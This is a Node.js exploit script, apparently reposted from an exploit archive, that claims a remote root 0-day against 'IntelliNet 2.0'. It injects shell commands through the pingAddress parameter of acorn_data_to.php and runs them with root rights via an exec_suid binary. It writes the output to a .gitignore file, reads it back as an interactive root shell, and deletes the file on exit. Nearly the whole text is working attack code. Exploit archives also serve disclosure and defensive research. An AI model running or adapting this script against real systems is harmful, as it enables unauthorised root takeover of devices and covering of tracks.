Share
## https://sploitus.com/exploit?id=PACKETSTORM:181241
#!/usr/local/bin/node  
const { execSync } = require('child_process');  
const readline = require('readline');  
  
let TARGET = '';  
let COMMAND = '';  
let SESSION = '';  
  
const ESCALATE = '/usr/aes/bin/exec_suid';  
  
console.log(`  
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀  
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀  
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀  
⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀  
⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀  
⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀  
⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀  
⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀  
⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀  
⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀  
⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀  
⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀  
⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀  
⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀  
⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀  
  
╔════════════════════════════════════════════╗  
║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║  
║ Author: Jean Pereira <info@cytres.com> ║  
╚════════════════════════════════════════════╝  
  
`);  
  
const cleanUp = () => {  
execSync(  
`curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"`  
);  
};  
  
const createShell = (cmd) => {  
execSync(  
`curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent(  
[ESCALATE, cmd].join(' ')  
)}%20%3E%20.gitignore;"`  
);  
return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim();  
};  
  
const rl = readline.createInterface({  
input: process.stdin,  
output: process.stdout,  
});  
  
const interactiveShell = () => {  
rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => {  
if (currentCommand.trim() === '!q') {  
console.log('Cleaning up...');  
cleanUp();  
rl.close();  
} else {  
COMMAND = currentCommand;  
let output = createShell(COMMAND);  
console.log(output);  
interactiveShell();   
}  
});  
};  
  
rl.question('[*] Enter target IP: ', (targetIP) => {  
TARGET = targetIP;  
SESSION = createShell('echo a1b2c3d4$HOSTNAME');  
if (!SESSION.startsWith('a1b2c3d4')) {  
console.log('[*] Could not execute payload, aborting');  
process.exit(0);  
} else {  
console.log('[*] Payload injected to firmware');  
console.log('[*] Launching root shell via exec_suid');  
}  
console.log('');  
interactiveShell();  
});  
  
rl.on('close', () => {  
process.exit(0);  
});